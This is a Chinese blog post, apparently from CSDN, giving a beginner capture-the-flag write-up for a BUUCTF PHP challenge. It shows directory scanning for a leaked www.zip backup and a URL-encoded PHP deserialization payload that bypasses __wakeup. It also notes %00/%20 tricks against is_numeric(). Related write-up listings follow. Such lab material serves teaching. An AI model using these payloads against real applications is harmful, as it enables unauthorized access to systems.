web安全入门-buuctf-[极客大挑战 2019]PHP 1

已于 2024-04-23 16:17:18 修改
阅读量336 收藏 5
点赞数 2
文章标签: php 开发语言
于 2024-04-21 20:18:38 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2301_80137226/article/details/137717241
版权

有点提示,‘有一个良好的备份网站的习惯’,我们尝试一下看一下网站目录,或尝试输入网站源码来备份文件

一,使用用dirsearch或dirmap来扫描网站

我使用的是top7000

扫出来www.zip

下载

二,通过知识来猜测

打开class和index

发现index.php包含了class.php还有一个select为变量,我们看一下class

class定义了一个Name,当password=100和username=admin时会输出flag

我们尝试构造payload

O%3A4%3A%22Name%22%3A2%3A%7Bs%3A14%3A%22%00Name%00username%22%3Bs%3A5%3A%22admin%22%3Bs%3A14%3A%22%00Name%00password%22%3Bi%3A100%3B%7D

得到了这样的一个URL

调用unserialize()时会自动调用魔法函数wakeup(),可以通过改变属性数绕过,把Name后面的2改为3或以上即可

O%3A4%3A%22Name%22%3A3%3A%7Bs%3A14%3A%22%00Name%00username%22%3Bs%3A5%3A%22admin%22%3Bs%3A14%3A%22%00Name%00password%22%3Bi%3A100%3B%7D

就得到了flag

[ACTF2020 新生赛]BackupFile

跟上一个题是一样的思路

用dirsearch扫一下扫到一个文件

再下载

主要的收获是php中的两个函数

is_numeric()和intval();

is_numeric() 可以检测「变量」是否为「数字」或数字字符串。

常见的绕过就是在数字前或后加%00 ,在后加%20

详情见https://blog.csdn.net/wangyuxiang946/article/details/131211111

ntval() 函数可以获取变量的「整数值」。常用于强制类型转换

详情见https://blog.csdn.net/wangyuxiang946/article/details/131156104?ops_request_misc=%257B%2522request%255Fid%2522%253A%2522171385876916800185827932%2522%252C%2522scm%2522%253A%252220140713.130102334..%2522%257D&request_id=171385876916800185827932&biz_id=0&utm_medium=distribute.pc_search_result.none-task-blog-2~all~top_click~default-2-131156104-null-null.142^v100^pc_search_result_base7&utm_term=intval&spm=1018.2226.3001.4187icon-default.png?t=N7T8https://blog.csdn.net/wangyuxiang946/article/details/131156104?ops_request_misc=%257B%2522request%255Fid%2522%253A%2522171385876916800185827932%2522%252C%2522scm%2522%253A%252220140713.130102334..%2522%257D&request_id=171385876916800185827932&biz_id=0&utm_medium=distribute.pc_search_result.none-task-blog-2~all~top_click~default-2-131156104-null-null.142^v100^pc_search_result_base7&utm_term=intval&spm=1018.2226.3001.4187

2301_80137226
关注
  • 2
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 2
    评论
【网络安全 | CTF】CTF极客挑战2019PHP解题详析(Dirsearch+php反序列化)
等风来
08-24 4608
同时,因为private 声明的字段为私有字段,只在所声明的类中可见,在该类的子类和该类的对象实例中均不可见。因此私有字段的字段名在序列化(即构造POC)时,类名和字段名前面都会加上ascii为0的字符(不可见字符)construct 是构造函数,在对象被创建的时候自动调用,进行类的初始化,也就是说对象创建完成以后第一个被对象自动调用的方法。如果构造的链子中含有空格,那么空格被url编码为%20后会导致链子不能被反序列化。得到的扫描结果中包含www.zip目录。提示:有一个良好的备份网站的习惯。
BUUCTF】[极客挑战 2019] PHP 清晰易懂详细总结 Writeup
algae
08-26 1950
BUUCTF】[极客挑战 2019] PHP Writeup0x00 考点目录扫描源码泄露反序列化0x01 解题 0x00 考点 目录扫描 源码泄露 反序列化 0x01 解题 dirsearch -u 指定url -e 指定网站语言 -w 可以加上自己的字典(加上路径) -r 递归跑(查到一个目录后,在目录后重复跑,很慢,不建议用) python3 dirsearch.py -u http://26e0c1d7-d98e-4a34-9ffe-901887297fb5.node3.buuoj.cn
BUUCTF-[极客挑战 2019]PHP
rumil的博客
06-29 209
通过第二个if控制语句,我们发现通过正则表达式过滤掉了flag,所有说file参数传入时,如果有flag出现就会被过滤掉,我们再根据下一句话,文件包含,我们尝试去获取useless.php 的源码,看是什么信息,再次构造payload。发现是网页的源码,经过分析可得,三个参数分别为text,file,password通过get方式进行传参,在if控制语句当中,设置text变量,并在文件当中读取数据,要等于welcome to the zjctf才会返回true。:私有的类成员则只能被其定义所在的类访问。
BUUCTF[极客挑战 2019]PHP1题解
最新发布
cxm4545的博客
04-26 603
想要得到flag,必须满足username===admin,password==100,于是我们就要绕过__wakeup()函数了。(Value是代码运行结果,这里要注意改一下参数个数以绕过__wakeup()函数)(1)进入靶机,我们看到网页提示:备份网站,这时候我们就应该想到有可能源码泄露了。很明显,用get传参,然后反序列化,其实这里就是一个反序列化的题目了。(5)在class.php中,我们观察一下这个Name类。(2)因此,写一个python脚本,扫描一下这个网站。(7)我们写一下代码。
BUUCTF——[极客挑战 2019]PHP
doraemon12345的博客
06-07 291
打开题目,页面上显示说习惯备份,尝试下载备份www.zip,下载后打开查看 flag文件里并不是flag,查看其他的在class文件中发现代码,应该是让我们反序列化,给出源代码 <?php include 'flag.php'; error_reporting(0); class Name{ private $username = 'nonono'; private $password = 'yesyes'; public function __construct(
BUUCTF-web [极客挑战 2019]PHP1
zzqzzq11的博客
08-06 865
buuctf
GFG-:极客极客30天挑战
02-17
极客30天挑战2021年1月 30天练​​习问题的Python解决方案: 与同学一起翻阅怪胎。(Array); 第N个自然数; 不能表示为Sum的最小正整数; 从抽屉里拿出“ k”双袜子的最小采摘次数; 螺旋矩阵奇克兰的硬币; 有效...
微信小程序-极客学院.zip
04-14
1. **页面生命周期**:每个小程序页面都有自己的生命周期,包括onLoad、onShow、onHide等方法,用于在特定时刻执行相应的函数,如加载数据、显示或隐藏页面。 2. **数据绑定**:WXML与JS之间通过数据绑定实现交互。...
GeekBand-IOS-1501-SampleProject:极客班IOS专业样本项目资源库
04-30
GeekBand-IOS-1501-SampleProject极客班IOS专业样本项目资源库为了推进项目实践,极客班将推出样本项目(蓦然)的Lab Manual帮助学员实践一个APP的开发。项目讨论区:更新日志:2015/09/23 蓦然LabManual_登录模块_...
geek-festa-web-api-sample:极客节庆的样本Web API
03-10
极客节庆的样本Web API】是一个基于C#编程语言构建的应用程序,它展示了如何设计和实现一个功能丰富的Web API。Web API是应用程序接口的一种形式,允许不同系统之间通过HTTP协议交换数据,通常用于构建服务端应用...
BUUCTF-Web】 [极客挑战 2019]PHP
RexHa的博客
09-04 735
BUUCTF-Web】 [极客挑战 2019]PHP
BUUCTF-web极客挑战-2019 PHP
qq_48149564的博客
11-13 116
反序列化
[极客挑战 2019]PHP unserialize
qq_45951598的博客
10-26 645
这里我用的是buuctf里面的[极客挑战 2019]PHP 1。 这里我们看到题目,然后发现提示,他说有网站备份,我们知道备份文件一般是bak格式的,这里我用xshell连接kali,然后用kali去扫描网站目录。 这里dirsearch在kali不是自带的,要自己去下一条命令就可以下载好,然后自己学一下如何扫描,很简单。 进入目录之后输入网址 这里发现有非常多的目录 但是发现这个颜色不一样,事出反常必有妖,所以访问看看。 这里发现需要下载文件,然后我们把文件下载一下,看一下。 这里我们解压一下发现这里应
BUUCTF——[极客挑战2019]PHP1
weixin_62248541的博客
11-25 213
BUUCTF——[极客挑战2019]PHP1
BUUCTF--[极客挑战 2019]PHP
qq_46263951的博客
09-04 277
学了几天的PHP反序列化漏洞,找一个比较简单的题练练手 进入后给出提示网站存在备份,尝试几种常见的备份目录或者也可以直接扫描目录 访问/www.zip时弹出下载框,得到源代码,flag.php文件只有被调用执行才可获得到flag 在index.php中发现这样一段代码 <?php include 'class.php'; $select = $_GET['select']; //可控参数 $res=unserialize(@$select); //反序列化 ?> ...
[BUUCTF][极客挑战 2019]PHP
朋克归零膏的博客
10-17 386
反序列化漏洞。
[极客挑战 2019]PHP --BUUCTF
weixin_62134664的博客
12-04 969
并且绕过wakeup函数,wakeup方法挺容易绕过的,就是修改实际成员数目(类中变量数目),大于实际成员数目就不会执行wakeup函数了。逐个访问了index.php的备份,啥也没有无奈只好上工具dirsearch扫,打开终端,命令。提示有源码备份,查看了一下网站源码也没发现有啥,尝试了一些备份文件的后缀,扫完后,发现有个特殊的目录,www.zip,访问下载了个压缩包。这里将2改为3,绕过wakeup函数,接着构造payload。又是一道反序列化的题目,看了一下源码,得到思路,让。
buuctf web 极客挑战2019
08-24
对于BUUCTF Web极客挑战2019,我了解到它是一个网络安全比赛,由北方工业大学举办。这个比赛旨在考察参赛者的网络攻防能力和Web漏洞挖掘技术。比赛的题目涵盖了Web安全的各个方面,包括但不限于漏洞利用、代码审计...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值